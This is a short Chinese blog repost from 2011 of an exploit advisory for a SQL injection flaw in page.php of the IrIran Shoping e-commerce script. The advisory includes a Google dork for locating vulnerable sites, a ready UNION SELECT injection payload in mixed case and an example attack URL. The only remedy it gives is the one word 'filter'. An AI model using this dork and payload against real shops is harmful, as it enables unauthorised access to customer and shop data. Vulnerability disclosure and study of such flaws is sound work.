Chinaunix首页 | 论坛 | 博客
  • 博客访问: 3029694
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2011-04-01 15:57:03

IrIran Shoping是一款在线电子商务系统,IrIran Shoping中的page.php存在SQL注入漏洞,可能导致敏感信息泄露。
  [+]info:
  ~~~~~~~~~
  [~] Title     : IrIran Shoping Script SQL Injection Vulnerability
  [~] Author    : Net.Edit0r
  [~] Vendor or Software Link  :

  [~] Email     :
  [~] Data  : 2011-03-29
  [~] Google dork: "Powered by: IRIran.net"
  [~] Category:  [Webapps]
  [~] Tested on: [Linux /php]
  [+]poc:
  ~~~~~~~~~
  [~] Vulnerable File :
  
http://oma.cublog.cn/products/page.php?id=[SQL]
  [~] ExploiT         :
  -10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--
  [~] Example         :
  
http://oma.cublog.cn/products/page.php?id=-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--
  [~] Demo            :
  
--
  修复:过滤
阅读(678) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~